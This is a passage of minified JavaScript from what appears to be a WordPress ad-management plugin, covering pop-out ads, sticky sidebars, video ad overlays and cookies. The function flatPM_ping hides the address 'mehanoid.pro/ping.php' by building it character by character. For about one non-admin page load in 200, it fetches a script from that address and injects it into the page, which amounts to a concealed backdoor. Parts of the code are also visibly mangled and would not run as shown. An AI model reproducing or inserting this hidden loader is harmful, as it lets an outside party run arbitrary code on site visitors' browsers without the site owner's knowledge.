":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}